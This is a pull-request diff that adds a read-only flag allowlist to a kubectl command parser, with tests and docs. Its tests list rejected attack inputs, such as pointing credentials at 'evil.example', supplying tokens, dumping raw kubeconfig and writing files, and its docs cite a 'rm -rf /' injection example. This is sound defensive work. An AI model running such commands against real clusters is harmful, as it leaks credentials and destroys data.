### PR TITLE
fix(holodeck): constrain k8s.exec kubectl flags to a read-only allowlist

### DIFF
--- a/backend/src/meho_backplane/connectors/holodeck/ops_read.py
+++ b/backend/src/meho_backplane/connectors/holodeck/ops_read.py
@@ -90,9 +90,15 @@ allowlist layers:
    :data:`_SHELL_METACHARS_RE` and refuses on hit, then (b) tokenises
    via :func:`shlex.split`, (c) checks for a 2-token verb prefix
    against :data:`_K8S_MULTIWORD_READ_VERBS` first, and (d) falls
-   through to the single-word :data:`_K8S_READ_VERBS` safelist. Any
-   rejected step raises :exc:`KubectlSafetyError`, which the
-   dispatcher's exception path turns into a
+   through to the single-word :data:`_K8S_READ_VERBS` safelist, and
+   (e) validates **every** flag token -- before and after the verb,
+   attached and separated -- against the positive
+   :data:`_K8S_ALLOWED_FLAGS` allowlist so endpoint/TLS/credential/
+   context overrides, the raw credential view (``--raw``) and
+   file-writing options (``--output-directory``) are rejected even
+   though they carry no shell metacharacter and sit behind a
+   read-only verb. Any rejected step raises :exc:`KubectlSafetyError`,
+   which the dispatcher's exception path turns into a
    ``result_connector_error`` envelope. The metacharacter reject is
    **load-bearing**: ``shlex.split`` in POSIX mode does not treat
    shell separators as token boundaries, so a chained payload like
@@ -269,6 +275,121 @@ _K8S_MULTIWORD_READ_VERBS: dict[str, frozenset[str]] = {
 #: * ``\\`` -- line continuation / escape into the next char
 _SHELL_METACHARS_RE: re.Pattern[str] = re.compile(r"[;&|<>`$()\\\n\r]")
 
+#: Positive allowlist of ``kubectl`` flags accepted anywhere in a
+#: read invocation -- both the "global" position before the verb and
+#: the argument position after it. Every flag **not** in this set is
+#: rejected, which closes the argument-level injection class that a
+#: verb safelist plus a shell-metacharacter reject leave open:
+#:
+#: * **Endpoint / TLS-trust / credential overrides** -- ``--server`` /
+#:   ``-s``, ``--kubeconfig``, ``--token``, ``--username`` /
+#:   ``--password``, ``--client-certificate`` / ``--client-key``,
+#:   ``--certificate-authority``, ``--insecure-skip-tls-verify``,
+#:   ``--tls-server-name``, ``--as`` / ``--as-group`` / ``--as-uid``.
+#:   These would let the caller point the appliance's bearer
+#:   credentials at an endpoint of their choosing or disable TLS
+#:   verification. Endpoint, context, credential and TLS trust are
+#:   owned by the appliance's own kubeconfig, never by the caller.
+#: * **Context / cluster / user selection** -- ``--context`` /
+#:   ``--cluster`` / ``--user`` pick a different identity out of the
+#:   kubeconfig; the appliance's default context is the only one the
+#:   caller may exercise.
+#: * **Raw credential view** -- ``--raw`` on ``config view`` prints
+#:   client certs / bearer tokens verbatim.
+#: * **File-writing options** -- ``--output-directory`` (``cluster-info
+#:   dump``), ``--output-file``, ``--cache-dir``, ``--profile-output``
+#:   write on the appliance filesystem.
+#:
+#: The allowlisted flags are all read-scoping / output-formatting
+#: options that neither redirect the connection nor touch disk. See
+#: the kubectl reference for the read/global flag split:
+#: https://kubernetes.io/docs/reference/kubectl/.
+_K8S_ALLOWED_FLAGS: frozenset[str] = frozenset(
+    {
+        # Scoping.
+        "-n",
+        "--namespace",
+        "-A",
+        "--all-namespaces",
+        "-l",
+        "--selector",
+        "--field-selector",
+        # Output formatting -- read-only, never writes to disk.
+        "-o",
+        "--output",
+        "--sort-by",
+        "-L",
+        "--label-columns",
+        "--show-labels",
+        "--show-kind",
+        "--no-headers",
+        "--ignore-not-found",
+        "--chunk-size",
+        # get / explain.
+        "--recursive",
+        "--api-version",
+        "--subresource",
+        # logs.
+        "-c",
+        "--container",
+        "--all-containers",
+        "--tail",
+        "--since",
+        "--since-time",
+        "--timestamps",
+        "-p",
+        "--previous",
+        "--prefix",
+        "--limit-bytes",
+        "--max-log-requests",
+        # describe.
+        "--show-events",
+        # top.
+        "--containers",
+        # auth can-i.
+        "--list",
+        "-q",
+        "--quiet",
+    }
+)
+
+#: Subset of :data:`_K8S_ALLOWED_FLAGS` that consume a following value
+#: token when written in the **separated** form (``--namespace
+#: holodeck`` rather than ``--namespace=holodeck``). The walk needs
+#: this to step over the value while locating the verb -- otherwise a
+#: value like ``holodeck`` in ``kubectl -n holodeck get pods`` would be
+#: mistaken for the verb. Boolean flags (``-A``, ``--show-labels``,
+#: ...) are absent, so the token after them is treated as the verb /
+#: a positional. A separated value is only swallowed when it does not
+#: itself start with ``-`` (so ``--namespace --server=evil`` does not
+#: hide ``--server`` as a value -- the ``--server`` token is then
+#: validated and rejected on the next step; negative numeric values
+#: must use the attached form, e.g. ``--tail=-1``).
+_K8S_VALUE_FLAGS: frozenset[str] = frozenset(
+    {
+        "-n",
+        "--namespace",
+        "-l",
+        "--selector",
+        "--field-selector",
+        "-o",
+        "--output",
+        "--sort-by",
+        "-L",
+        "--label-columns",
+        "--chunk-size",
+        "--api-version",
+        "--subresource",
+        "-c",
+        "--container",
+        "--tail",
+        "--since",
+        "--since-time",
+        "--limit-bytes",
+        "--max-log-requests",
+    }
+)
+
 
 class KubectlSafetyError(ValueError):
     """Raised by :func:`parse_kubectl_command` when the verb is not read-only.
@@ -285,22 +406,74 @@ class KubectlSafetyError(ValueError):
     """
 
 
+def _validate_flag(token: str) -> bool:
+    """Validate one ``-``-prefixed *token* against :data:`_K8S_ALLOWED_FLAGS`.
+
+    The flag name is the part before an ``=`` (``--namespace`` for both
+    ``--namespace=x`` and ``--namespace x``). A name absent from the
+    allowlist raises :exc:`KubectlSafetyError` -- this is the gate that
+    rejects endpoint / TLS / credential / context overrides, the raw
+    credential view and file-writing options that a verb safelist alone
+    lets through.
+
+    Returns ``True`` when the flag takes a value in the **separated**
+    form (name is in :data:`_K8S_VALUE_FLAGS` and the token carried no
+    attached ``=value``), so the caller knows a following value token
+    may need to be stepped over. The returned message never echoes a
+    flag value -- only the flag name, which is not sensitive.
+    """
+    name = token.split("=", 1)[0]
+    if name not in _K8S_ALLOWED_FLAGS:
+        raise KubectlSafetyError(
+            f"kubectl flag {name!r} is not on the read-only allowlist; "
+            "endpoint (--server), TLS-trust, credential (--token, "
+            "--kubeconfig), context/cluster/user, raw-credential "
+            "(--raw) and file-writing (--output-directory) overrides "
+            "are rejected -- those are owned by the appliance config"
+        )
+    return "=" not in token and name in _K8S_VALUE_FLAGS
+
+
 def _skip_global_flags(tokens: list[str]) -> int:
     """Return the index of the first non-flag token after ``kubectl``.
 
-    Walks past leading flag tokens. Attached-value flags
-    (``--context=foo``) consume one token; separated-value flags
-    (``--context foo``) consume two. The returned index points at the
-    verb -- or off the end of ``tokens`` when there is no verb.
+    Walks past leading flag tokens, **validating each against
+    :data:`_K8S_ALLOWED_FLAGS`** (via :func:`_validate_flag`) so a
+    global-position credential/endpoint override is refused before the
+    verb is even reached. Attached-value flags (``--namespace=foo``)
+    consume one token; separated-value flags (``--namespace foo``)
+    consume two -- but a separated value that itself starts with ``-``
+    is not swallowed, so it is validated as its own flag on the next
+    iteration rather than hiding a rejected flag as a value. The
+    returned index points at the verb -- or off the end of ``tokens``
+    when there is no verb. Raises :exc:`KubectlSafetyError` on the
+    first disallowed flag.
     """
     idx = 1
     while idx < len(tokens) and tokens[idx].startswith("-"):
-        token = tokens[idx]
+        consumes_value = _validate_flag(tokens[idx])
         idx += 1
-        if "=" not in token and idx < len(tokens) and not tokens[idx].startswith("-"):
-            # Separated flag value (``--context foo``); consume.
+        if consumes_value and idx < len(tokens) and not tokens[idx].startswith("-"):
+            # Separated flag value (``--namespace foo``); step over it.
             idx += 1
     return idx
+
+
+def _reject_disallowed_arg_flags(args: list[str]) -> None:
+    """Validate every ``-``-prefixed token among post-verb *args*.
+
+    Positional tokens (resource kinds / names) pass untouched -- they
+    were already screened for shell metacharacters in
+    :func:`parse_kubectl_command`. Flag tokens go through
+    :func:`_validate_flag`, so an argument-position override
+    (``kubectl get pods --server=… --insecure-skip-tls-verify``,
+    ``kubectl config view --raw``, ``kubectl cluster-info dump
+    --output-directory=/tmp``) is rejected exactly like a global-position
+    one. Raises :exc:`KubectlSafetyError` on the first disallowed flag.
+    """
+    for token in args:
+        if token.startswith("-"):
+            _validate_flag(token)
 
 
 def _check_multiword_verb(tokens: list[str], idx: int, verb: str) -> tuple[str, list[str]]:
@@ -330,9 +503,21 @@ def _check_multiword_verb(tokens: list[str], idx: int, verb: str) -> tuple[str, 
 def parse_kubectl_command(command: str) -> tuple[str, list[str]]:
     """Parse ``command`` into ``(verb, args)``; enforce the read-only safelist.
 
-    The first whitespace-separated token must be ``kubectl``. After
-    walking past any global flags via :func:`_skip_global_flags`, the
-    verb is matched against two safelists in order:
+    The first whitespace-separated token must be ``kubectl``. Every
+    flag -- in the global position before the verb (validated while
+    :func:`_skip_global_flags` locates the verb) and in the argument
+    position after it (validated by :func:`_reject_disallowed_arg_flags`)
+    -- is checked against the positive :data:`_K8S_ALLOWED_FLAGS`
+    allowlist. Endpoint (``--server``), TLS-trust
+    (``--insecure-skip-tls-verify``, ``--certificate-authority`` …),
+    credential (``--token``, ``--kubeconfig`` …), context/cluster/user
+    selection, the raw credential view (``--raw``) and file-writing
+    (``--output-directory``, ``--output-file`` …) flags are all
+    off-list and rejected, in both attached (``--flag=value``) and
+    separated (``--flag value``) forms; those settings are owned by the
+    appliance's own kubeconfig, not the caller's command line. After
+    walking past the (now-validated) global flags, the verb is matched
+    against two safelists in order:
 
     1. **Multi-word prefix first** (:func:`_check_multiword_verb`).
        If ``tokens[idx]`` is a key in :data:`_K8S_MULTIWORD_READ_VERBS`
@@ -353,21 +538,14 @@ def parse_kubectl_command(command: str) -> tuple[str, list[str]]:
     (``"config view"``).
 
     Tokenisation runs via :func:`shlex.split` so quoted resource names
-    (``"my pod"``) survive the parse. Before tokenisation the function
-    scans for POSIX-shell metacharacters (:data:`_SHELL_METACHARS_RE`)
-    and refuses the call if any are found. This is **load-bearing**:
-    ``shlex.split`` in POSIX mode does not treat ``;`` / ``&&`` /
-    ``|`` / ``$(...)`` / backticks / ``>`` / ``<`` / newlines as token
-    boundaries, so a chained payload like ``kubectl get pods; rm -rf /``
-    would tokenise to ``['kubectl', 'get', 'pods;', ...]``, the verb
-    check would approve ``get``, and the handler would forward the
-    **raw string** verbatim to ``asyncssh.SSHClientConnection.run`` --
-    which delegates to the remote login shell where the metacharacters
-    are interpreted. The metachar reject closes that hole before
-    tokenisation runs.
-
-    Empty / metachar-bearing / non-``kubectl`` / safelist-misses raise
-    :exc:`KubectlSafetyError` before any SSH traffic happens.
+    (``"my pod"``) survive the parse. POSIX-shell metacharacters
+    (:data:`_SHELL_METACHARS_RE`) are rejected *before* tokenisation --
+    load-bearing, since ``shlex.split`` does not split on shell
+    separators, so an un-scanned ``kubectl get pods; rm -rf /`` would
+    reach the remote login shell verbatim (see the module docstring).
+    Empty / metachar-bearing / non-``kubectl`` / safelist- or
+    allowlist-misses all raise :exc:`KubectlSafetyError` before any SSH
+    traffic happens.
 
     Examples
     --------
@@ -381,11 +559,8 @@ def parse_kubectl_command(command: str) -> tuple[str, list[str]]:
     """
     if not command or not command.strip():
         raise KubectlSafetyError("kubectl command is empty")
-    # Metacharacter rejection -- load-bearing security gate (see
-    # docstring above and :data:`_SHELL_METACHARS_RE`). Don't echo the
-    # offending character back in the message: that's an
-    # operator-visible surface and the rejected verbatim character
-    # set is auditable through the audit_log row's ``params_hash``.
+    # Metacharacter rejection -- load-bearing security gate. Don't echo
+    # the offending character back (operator-visible surface).
     if _SHELL_METACHARS_RE.search(command):
         raise KubectlSafetyError(
             "kubectl command rejected: shell metacharacter detected; "
@@ -414,13 +589,17 @@ def parse_kubectl_command(command: str) -> tuple[str, list[str]]:
     # safelist does NOT include the multi-word parents, so a missing
     # sub-verb fails closed via ``_check_multiword_verb``.
     if verb in _K8S_MULTIWORD_READ_VERBS:
-        return _check_multiword_verb(tokens, idx, verb)
+        canonical, args = _check_multiword_verb(tokens, idx, verb)
+        _reject_disallowed_arg_flags(args)
+        return canonical, args
     if verb not in _K8S_READ_VERBS:
         raise KubectlSafetyError(
             f"kubectl verb {verb!r} is not on the read-only safelist; "
             f"allowed: {sorted(_K8S_READ_VERBS)}"
         )
-    return verb, tokens[idx + 1 :]
+    args = tokens[idx + 1 :]
+    _reject_disallowed_arg_flags(args)
+    return verb, args
 
 
 # ---------------------------------------------------------------------------
@@ -861,10 +1040,12 @@ async def holodeck_k8s_exec(
     string starting with ``kubectl <read-verb> ...``). The handler:
 
     1. Parses the command via :func:`parse_kubectl_command`; shell
-       metacharacters and mutating verbs raise
-       :exc:`KubectlSafetyError` **before** any SSH transport is
-       touched. The exception is folded into a ``result_connector_
-       error`` envelope by the structured-error path below.
+       metacharacters, mutating verbs and off-allowlist flags
+       (endpoint/TLS/credential/context overrides, ``--raw``,
+       file-writing options) raise :exc:`KubectlSafetyError`
+       **before** any SSH transport is touched. The exception is
+       folded into a ``result_connector_error`` envelope by the
+       structured-error path below.
     2. Runs the parsed command verbatim over plain SSH (no ``pwsh``;
        the in-appliance K8s is reached through the appliance's
        ``kubectl`` binary, not through PowerShell).
@@ -1443,10 +1624,20 @@ READ_OPS: tuple[HolodeckOp, ...] = (
             "``config get-contexts``, ``config get-clusters``, "
             "``config get-users``, ``config current-context``, "
             "``auth can-i``, ``auth whoami``. Use to inspect cluster "
-            "state without mutating it. The schema pattern enforces "
-            "the ``kubectl <read-verb> ...`` shape at the validator "
-            "layer; the handler re-checks the verb as a belt-and-braces "
-            "safety gate. Because the command line is operator-supplied, "
+            "state without mutating it. Flags are constrained to a "
+            "positive read-only allowlist (namespace / selector / "
+            "output-format / logs-scoping options): endpoint "
+            "(``--server``), TLS-trust (``--insecure-skip-tls-verify``), "
+            "credential (``--token``, ``--kubeconfig``), "
+            "context/cluster/user, raw-credential (``--raw``) and "
+            "file-writing (``--output-directory``) flags are rejected, "
+            "so the caller cannot redirect the appliance's credentials, "
+            "disable TLS verification, dump the raw kubeconfig or write "
+            "files -- those are owned by the appliance's own kubeconfig. "
+            "The schema pattern enforces the ``kubectl <read-verb> ...`` "
+            "shape at the validator layer; the handler is the "
+            "authoritative gate that re-checks the verb and the flag "
+            "allowlist. Because the command line is operator-supplied, "
             "this op is approval-gated: a dispatch parks for human "
             "approval before the command runs, rather than executing "
             "unattended."
@@ -1524,7 +1715,16 @@ READ_OPS: tuple[HolodeckOp, ...] = (
                         "restricted to ``[A-Za-z0-9._/=:,@-]`` -- shell "
                         "metacharacters (``;``, ``&``, ``|``, ``$``, "
                         "backticks, ``>``, ``<``, parens, ``\\``) are "
-                        "rejected before the handler is reached."
+                        "rejected before the handler is reached. Flags "
+                        "are limited to a positive read-only allowlist "
+                        "(``-n``/``--namespace``, ``-o``/``--output``, "
+                        "``-l``/``--selector``, logs-scoping options, "
+                        "...); endpoint/TLS/credential/context overrides "
+                        "(``--server``, ``--insecure-skip-tls-verify``, "
+                        "``--token``, ``--kubeconfig``, ``--context``), "
+                        "the raw credential view (``--raw``) and "
+                        "file-writing options (``--output-directory``) "
+                        "are rejected by the handler."
                     ),
                 },
             },
@@ -1560,7 +1760,17 @@ READ_OPS: tuple[HolodeckOp, ...] = (
                 "<verb> <resource>`` / ``kubectl auth whoami`` for "
                 "authorization inspection. Mutating verbs and "
                 "mutating sub-verbs (``config set-context``, "
-                "``auth reconcile``, etc.) fail closed. This op is "
+                "``auth reconcile``, etc.) fail closed. Flags are "
+                "limited to read-only scoping/formatting options "
+                "(``-n``, ``-o``, ``-l``, ``--field-selector``, "
+                "logs-scoping options, ...); endpoint/TLS/credential/"
+                "context overrides (``--server``, "
+                "``--insecure-skip-tls-verify``, ``--token``, "
+                "``--kubeconfig``, ``--context``), the raw credential "
+                "view (``--raw``) and file-writing options "
+                "(``--output-directory``) are rejected -- endpoint, "
+                "context, credential and TLS trust are owned by the "
+                "appliance's own kubeconfig. This op is "
                 "approval-gated: a dispatch parks for human approval "
                 "before the command runs, rather than executing "
                 "unattended. " + _SSH_TRANSPORT_NOTE
@@ -1578,7 +1788,7 @@ READ_OPS: tuple[HolodeckOp, ...] = (
                 "``{stdout: '<text>', stderr: '<truncated text>', "
                 "exit_status: <int|null>}``. ``stderr`` is capped at "
                 "4096 chars. ``error`` is set when the safety check "
-                "rejected the verb or the SSH call failed."
+                "rejected the verb or a flag, or the SSH call failed."
             ),
         },
     ),

--- a/backend/tests/test_connectors_holodeck_ops.py
+++ b/backend/tests/test_connectors_holodeck_ops.py
@@ -59,6 +59,7 @@ import pytest
 import meho_backplane.connectors.holodeck  # noqa: F401 -- import for registry side-effects
 from meho_backplane.connectors.holodeck import HOLODECK_OPS, HolodeckConnector
 from meho_backplane.connectors.holodeck.ops_read import (
+    _K8S_ALLOWED_FLAGS,
     GROWTH_DIRS,
     READ_OPS,
     KubectlSafetyError,
@@ -184,23 +185,21 @@ def test_parse_kubectl_command_logs() -> None:
 
 
 def test_parse_kubectl_command_global_flag_separated() -> None:
-    """``kubectl --context foo get pods`` -- the verb is past the separated flag."""
-    verb, args = parse_kubectl_command("kubectl --context foo get pods")
+    """``kubectl --namespace holodeck get pods`` -- verb past a separated allowed flag."""
+    verb, args = parse_kubectl_command("kubectl --namespace holodeck get pods")
     assert verb == "get"
     assert args == ["pods"]
 
 
 def test_parse_kubectl_command_global_flag_attached() -> None:
-    """``kubectl --context=foo get pods`` -- attached-value flag form."""
-    verb, args = parse_kubectl_command("kubectl --context=foo get pods")
+    """``kubectl --namespace=holodeck get pods`` -- attached-value allowed flag form."""
+    verb, args = parse_kubectl_command("kubectl --namespace=holodeck get pods")
     assert verb == "get"
     assert args == ["pods"]
 
 
 def test_parse_kubectl_command_multiple_global_flags() -> None:
-    verb, _ = parse_kubectl_command(
-        "kubectl --kubeconfig=/tmp/x.yaml --namespace=holodeck get pods"
-    )
+    verb, _ = parse_kubectl_command("kubectl -A --namespace=holodeck get pods")
     assert verb == "get"
 
 
@@ -250,7 +249,7 @@ def test_parse_kubectl_command_rejects_mutating_verb(verb: str) -> None:
         "rm -rf /",
         "echo kubectl get pods",  # not starting with kubectl
         "kubectl",  # no verb
-        "kubectl --context=foo",  # no verb after global flags
+        "kubectl --namespace=foo",  # allowed global flag but no verb after it
     ],
 )
 def test_parse_kubectl_command_rejects_malformed(command: str) -> None:
@@ -272,6 +271,157 @@ def test_parse_kubectl_command_safelist_includes_top_explain() -> None:
 
 def test_parse_kubectl_command_safelist_includes_cluster_info() -> None:
     assert parse_kubectl_command("kubectl cluster-info")[0] == "cluster-info"
+
+
+# ---------------------------------------------------------------------------
+# parse_kubectl_command -- positive flag allowlist (F05)
+#
+# A read-only verb safelist plus a shell-metacharacter reject still let
+# through argument-level overrides -- endpoint (``--server``), disabled
+# TLS trust, raw kubeconfig views and file-writing options -- because
+# those flags carry no metacharacter and sit behind an allowed verb.
+# The parser now checks every flag (before AND after the verb, attached
+# AND separated) against a positive allowlist. These tests pin both
+# halves of that contract: ordinary reads keep working, overrides are
+# refused, and no command reaches SSH to prove it.
+# ---------------------------------------------------------------------------
+
+
+@pytest.mark.parametrize(
+    "command",
+    [
+        "kubectl get pods -n holodeck",
+        "kubectl get pods --namespace=holodeck",
+        "kubectl get pods -A",
+        "kubectl get pods --all-namespaces",
+        "kubectl get pods -o json",
+        "kubectl get pods --output=yaml",
+        "kubectl get pods -o wide --show-labels --no-headers",
+        "kubectl get pods -l app=web",
+        "kubectl get pods --selector=app=web --field-selector=status.phase=Running",
+        "kubectl get pods --sort-by=.metadata.name",
+        "kubectl logs my-pod -c my-container --tail=100 --since=5m --timestamps",
+        "kubectl logs my-pod -p --all-containers --limit-bytes=4096",
+        "kubectl describe pod my-pod --show-events",
+        "kubectl top pods --containers --sort-by=cpu",
+        "kubectl auth can-i list pods --namespace=holodeck",
+        "kubectl explain pods --recursive --api-version=v1",
+        "kubectl config view -o yaml",
+    ],
+)
+def test_parse_kubectl_command_accepts_allowed_read_flags(command: str) -> None:
+    """Ordinary inventory reads with read-only scoping/format flags pass."""
+    verb, _ = parse_kubectl_command(command)
+    assert verb  # a verb resolved without raising
+
+
+#: ``(label, command)`` pairs whose flag is an endpoint / TLS-trust /
+#: credential / context override, a raw-credential view or a
+#: file-writing option. Each must be rejected -- and the matrix
+#: deliberately places the offending flag both BEFORE and AFTER the
+#: verb and in both attached (``--flag=value``) and separated
+#: (``--flag value``) forms.
+_K8S_OVERRIDE_FLAG_REJECTS: tuple[tuple[str, str], ...] = (
+    # Endpoint override -- before the verb, both forms.
+    ("server_attached_pre", "kubectl --server=https://evil.example:6443 get pods"),
+    ("server_separated_pre", "kubectl --server https://evil.example:6443 get pods"),
+    ("server_short_pre", "kubectl -s https://evil.example:6443 get pods"),
+    # Endpoint override -- after the verb, both forms.
+    ("server_attached_post", "kubectl get pods --server=https://evil.example:6443"),
+    ("server_separated_post", "kubectl get pods --server https://evil.example:6443"),
+    # Disabled TLS trust.
+    ("insecure_tls_pre", "kubectl --insecure-skip-tls-verify get pods"),
+    ("insecure_tls_post", "kubectl get pods --insecure-skip-tls-verify"),
+    ("tls_server_name", "kubectl get pods --tls-server-name=evil"),
+    ("ca_override", "kubectl --certificate-authority=/tmp/ca.crt get pods"),
+    ("client_cert", "kubectl get pods --client-certificate=/tmp/c.pem"),
+    ("client_key", "kubectl get pods --client-key=/tmp/k.pem"),
+    # Credential overrides.
+    ("token_attached", "kubectl --token=abc123 get pods"),
+    ("token_separated", "kubectl --token abc123 get pods"),
+    ("kubeconfig_pre", "kubectl --kubeconfig=/tmp/x.yaml get pods"),
+    ("kubeconfig_post", "kubectl get pods --kubeconfig=/tmp/x.yaml"),
+    ("username", "kubectl --username=admin get pods"),
+    ("password", "kubectl --password=hunter2 get pods"),
+    ("impersonate_user", "kubectl --as=system:admin get pods"),
+    ("impersonate_group", "kubectl --as-group=system:masters get pods"),
+    # Context / cluster / user selection.
+    ("context_attached", "kubectl --context=evil get pods"),
+    ("context_separated", "kubectl --context evil config view"),
+    ("cluster_select", "kubectl --cluster=evil get pods"),
+    ("user_select", "kubectl --user=evil get pods"),
+    # Raw credential view.
+    ("raw_config_view", "kubectl config view --raw"),
+    # File-writing options.
+    ("cluster_info_dump_dir", "kubectl cluster-info dump --output-directory=/tmp/dump"),
+    (
+        "cluster_info_dump_dir_sep",
+        "kubectl cluster-info dump --output-directory /tmp/dump",
+    ),
+    ("cache_dir", "kubectl get pods --cache-dir=/tmp/c"),
+    ("profile_output", "kubectl get pods --profile-output=/tmp/p"),
+    # Unknown / non-read flags (fail closed, e.g. streaming watch).
+    ("unknown_flag", "kubectl get pods --totally-made-up"),
+    ("watch_stream", "kubectl get pods --watch"),
+)
+
+
+@pytest.mark.parametrize(
+    "command",
+    [c for _, c in _K8S_OVERRIDE_FLAG_REJECTS],
+    ids=[label for label, _ in _K8S_OVERRIDE_FLAG_REJECTS],
+)
+def test_parse_kubectl_command_rejects_override_flags(command: str) -> None:
+    """Endpoint/TLS/credential/context/raw/file flags are refused everywhere."""
+    with pytest.raises(KubectlSafetyError):
+        parse_kubectl_command(command)
+
+
+def test_parse_kubectl_command_override_reject_message_names_flag_not_value() -> None:
+    """The rejection names the flag but never echoes its (possibly secret) value."""
+    with pytest.raises(KubectlSafetyError) as excinfo:
+        parse_kubectl_command("kubectl --token=s3cr3t-bearer get pods")
+    message = str(excinfo.value)
+    assert "allowlist" in message
+    assert "s3cr3t-bearer" not in message
+
+
+def test_parse_kubectl_command_separated_value_does_not_hide_override() -> None:
+    """A value-flag with no value can't swallow a following override as its value."""
+    # ``--namespace`` expects a value; the next token ``--server=...``
+    # starts with ``-`` so it is NOT consumed as the value -- it is
+    # validated as its own flag and rejected.
+    with pytest.raises(KubectlSafetyError):
+        parse_kubectl_command("kubectl --namespace --server=https://evil get pods")
+
+
+def test_k8s_allowed_flags_carry_no_dangerous_global_flag() -> None:
+    """No allowlisted flag overlaps the kubectl endpoint/credential/TLS set."""
+    dangerous = {
+        "-s",
+        "--server",
+        "--kubeconfig",
+        "--token",
+        "--username",
+        "--password",
+        "--client-certificate",
+        "--client-key",
+        "--certificate-authority",
+        "--insecure-skip-tls-verify",
+        "--tls-server-name",
+        "--as",
+        "--as-group",
+        "--as-uid",
+        "--context",
+        "--cluster",
+        "--user",
+        "--raw",
+        "--output-directory",
+        "--output-file",
+        "--cache-dir",
+        "--profile-output",
+    }
+    assert _K8S_ALLOWED_FLAGS.isdisjoint(dangerous)
 
 
 # ---------------------------------------------------------------------------
@@ -318,8 +468,8 @@ def test_parse_kubectl_command_multiword_auth_whoami() -> None:
 
 
 def test_parse_kubectl_command_multiword_with_global_flag() -> None:
-    """Global flags before a multi-word verb don't break the 2-token prefix walk."""
-    verb, _ = parse_kubectl_command("kubectl --context=foo config view")
+    """Allowed global flags before a multi-word verb don't break the prefix walk."""
+    verb, _ = parse_kubectl_command("kubectl --namespace=holodeck config view")
     assert verb == "config view"
 
 
@@ -907,6 +1057,32 @@ async def test_k8s_exec_handler_rejects_shell_injection_before_ssh(
     assert result["stderr"] == ""
     assert "safety check" in result["error"]
     assert "shell metacharacter" in result["error"]
+
+
+@pytest.mark.parametrize(
+    "command",
+    [c for _, c in _K8S_OVERRIDE_FLAG_REJECTS],
+    ids=[label for label, _ in _K8S_OVERRIDE_FLAG_REJECTS],
+)
+@pytest.mark.asyncio
+async def test_k8s_exec_handler_rejects_override_flags_before_ssh(command: str) -> None:
+    """The k8s.exec handler refuses endpoint/TLS/credential/file flags BEFORE SSH.
+
+    Same discipline as the shell-injection guard: an argument-level
+    override carries no metacharacter and sits behind a read-only
+    verb, so the flag allowlist is the only thing standing between it
+    and the appliance. The reject must fire before ``_run_command`` is
+    awaited.
+    """
+    connector = HolodeckConnector()
+    with patch.object(connector, "_run_command", new_callable=AsyncMock) as mock_cmd:
+        result = await connector.k8s_exec(_TARGET, {"command": command})
+        mock_cmd.assert_not_awaited()
+        assert mock_cmd.await_count == 0
+    assert result["exit_status"] is None
+    assert result["stdout"] == ""
+    assert result["stderr"] == ""
+    assert "safety check" in result["error"]
 
 
 @pytest.mark.parametrize(

--- a/docs/codebase/connectors-holodeck.md
+++ b/docs/codebase/connectors-holodeck.md
@@ -50,7 +50,7 @@ Source: `backend/src/meho_backplane/connectors/holodeck/`.
   `holodeck_pod_list`, `holodeck_pod_info`, `holodeck_service_list`,
   `holodeck_k8s_exec`, `holodeck_logs_tail`, `holodeck_networking_show`,
   `holodeck_disk_usage`, `holodeck_backups_list`. Pure parsers:
-  `parse_kubectl_command` (verb-safelist enforcement),
+  `parse_kubectl_command` (verb-safelist + flag-allowlist enforcement),
   `parse_logs_tail_output` (GNU `tail` `==> path <==` header split),
   `parse_networking_payload` (four-section composer),
   `parse_disk_usage_output` (root-fs `df -B1` + per-dir `du -sb` composer
@@ -234,9 +234,11 @@ disclosure (CLAUDE.md postulate 5 + Initiative #371).
   `requires_approval=True`). Forwards an operator-supplied ``kubectl``
   command to the in-appliance K8s cluster. Because the command line is
   operator-supplied, the op is approval-gated: a dispatch parks for
-  human approval rather than running unattended. Its verb safelist still
-  confines it to read-only ``kubectl`` verbs, and two complementary
-  allowlist layers reject both mutating verbs and shell-injection shapes
+  human approval rather than running unattended. Its verb safelist
+  confines it to read-only ``kubectl`` verbs, a positive **flag
+  allowlist** confines it to read-only scoping/formatting options, and
+  two complementary allowlist layers reject mutating verbs and
+  shell-injection shapes
   (`;`, `&&`, `||`, `|`, `$(...)`, backticks, `>`, `<`, newline):
 
   1. *Schema layer.* The `command` parameter has a `pattern` regex
@@ -259,10 +261,12 @@ disclosure (CLAUDE.md postulate 5 + Initiative #371).
      (`[;&|<>` + backtick + `$()\\` + newline + carriage return]`) and
      refuses on hit, (b) tokenises via `shlex.split`, (c) walks past
      leading global flags (`--flag=value` and `--flag value` forms),
-     (d) checks the 2-token (parent, sub-verb) prefix against
-     `_K8S_MULTIWORD_READ_VERBS` first, and (e) falls through to the
-     single-word `_K8S_READ_VERBS`. Any rejected step raises
-     `KubectlSafetyError`; the handler returns
+     **validating each against `_K8S_ALLOWED_FLAGS`**, (d) checks the
+     2-token (parent, sub-verb) prefix against
+     `_K8S_MULTIWORD_READ_VERBS` first, (e) falls through to the
+     single-word `_K8S_READ_VERBS`, and (f) validates every remaining
+     argument-position flag against the same allowlist. Any rejected
+     step raises `KubectlSafetyError`; the handler returns
      `{stdout, stderr, exit_status, error}` with `error` set to the
      safety-check message. The metacharacter reject is **load-bearing**:
      `shlex.split` in POSIX mode does not treat shell separators as
@@ -285,6 +289,29 @@ disclosure (CLAUDE.md postulate 5 + Initiative #371).
   refuses any sub-verb not in the per-parent frozenset, so
   adjacent mutating sub-verbs (`config set-context`,
   `config unset`, `auth reconcile`, ...) fail closed.
+
+  The **flag allowlist** (`_K8S_ALLOWED_FLAGS`) closes the
+  argument-level class that the verb safelist and the metacharacter
+  reject leave open: a flag such as `--server`,
+  `--insecure-skip-tls-verify`, `--token`, `--kubeconfig`, `--context`,
+  `--raw` or `--output-directory` carries no shell metacharacter and
+  sits behind a read-only verb, so without a flag check the caller
+  could point the appliance's bearer credentials at an endpoint of
+  their choosing, disable TLS verification, dump the raw kubeconfig, or
+  write files on the appliance. `parse_kubectl_command` therefore
+  validates **every** flag — in both the global position before the
+  verb and the argument position after it, in both attached
+  (`--flag=value`) and separated (`--flag value`) forms — against a
+  positive allowlist of read-only scoping/formatting options
+  (`-n`/`--namespace`, `-o`/`--output`, `-l`/`--selector`,
+  `--field-selector`, `--sort-by`, logs-scoping options, ...). Endpoint,
+  context, credential and TLS trust are owned by the appliance's own
+  kubeconfig, never by the caller's command line. Off-allowlist flags
+  (including unknown flags and streaming `--watch`) fail closed. A
+  separated value that itself starts with `-` is not swallowed as the
+  preceding flag's value, so `--namespace --server=…` cannot smuggle a
+  rejected flag past the walk. The rejection message names the flag but
+  never echoes its (possibly secret) value.
 
   Stderr from the appliance is truncated at 4096 chars, matching the
   `PwshRunError` convention.


### PR DESCRIPTION
